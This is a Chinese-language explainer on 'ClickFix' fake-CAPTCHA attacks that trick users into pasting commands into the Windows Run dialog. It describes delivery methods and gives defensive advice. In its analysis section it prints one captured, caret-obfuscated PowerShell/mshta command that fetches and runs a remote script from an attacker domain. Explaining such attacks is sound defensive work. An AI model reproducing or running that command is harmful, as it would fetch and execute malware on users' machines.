理解 ClickFix 验证码恶意软件攻击
理解 ClickFix 验证码恶意软件攻击
ClickFix 攻击向量
"ClickFix" 攻击是一种社会工程学技术,恶意行为者假装提供技术修复或安全验证,诱使用户在自己的机器上手动执行代码。在 Hacker News 上报告的最近一次事件中,一位访问合法新闻博客的用户遇到了一个假冒的 CAPTCHA 页面,该页面请求 "手动验证步骤" 以证明他们是人类。
这些步骤通常会指示用户:
- 按下 Win + R (打开 Windows 运行对话框)。
- 按下 Ctrl + V 然后按 Enter (粘贴并运行剪贴板中的命令)。
此方法用于绕过传统的浏览器安全沙箱,因为用户被明确告知在浏览器环境外执行命令,实际上授予了恶意软件对操作系统的管理员或用户级访问权限。
恶意负载分析
在报告的案例中,用户剪贴板中复制的有效载荷是一个旨在下载并执行远程脚本的 PowerShell 命令:
pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi
对攻击的技术分析揭示了几种复杂的特征:
- 混淆: 该命令使用脱字符(
^)来混淆 URL 和命令字符串,使得简单的模式匹配安全工具更难检测。 - 动态交付: 钓鱼页面通常通过使用
srcDoc创建的iframe传递,这可以隐藏恶意内容,使一些扫描程序无法发现。 - 基于区块链的执行: 此攻击的一些版本高度复杂,会从以太坊或 Base 智能合约获取 JavaScript 脚本以执行它们,使攻击者能够维持持久且去中心化的命令与控制(C2)基础设施。
- 持久性: 该攻击可能会利用
LocalStorage存储脚本,这些脚本在每次页面加载时会被评估,确保恶意软件即使在初始投放者执行后仍然持续存在。
常见交付方式
这些攻击经常通过被入侵的合法网站传播,通常通过被黑客入侵的内容管理系统(CMS)如 WordPress,或通过恶意广告(恶意广告)传播。用户可能在他们多次访问过的博客或新闻网站上遇到这些假冒的 CAPTCHA,这使得攻击看起来更值得信赖。
其他攻击向量包括:
- SEO 中毒: 恶意链接出现在搜索引擎结果的顶部,有时伪装成官方软件下载(例如,假冒的 Claude AI 安装程序)。
- 被入侵的浏览器扩展: 具有广泛权限的恶意扩展可以将这些钓鱼框架注入用户访问的任何页面。
如何保护自己
没有任何合法的理由让 CAPTCHA 或任何网站验证过程要求您通过 Windows 运行对话框或终端执行代码。如果一个网站要求您运行命令来"验证您是人类",那就是一个骗局。
立即防御措施
- 永不执行 由网站提供的命令在您的系统终端或运行对话框中。
- 将钓鱼域名 报告给如 Google Safe Browsing 等服务,并将可疑文件或 URL 上传至 VirusTotal。
长期安全层
- 使用广告拦截器: 如 uBlock Origin 这样的工具可以阻止许多用于传递这些攻击的恶意脚本和广告网络。
- DNS 过滤: 使用安全导向的 DNS 提供商(例如 Quad9)或带有阻止列表的本地解析器(例如 Pi-hole)可以防止浏览器连接到已知的恶意域名。
- 终端用户警惕: 对异常的浏览器行为保持怀疑态度。如果一个网站要求系统级权限或手动命令执行,请将其视为安全威胁。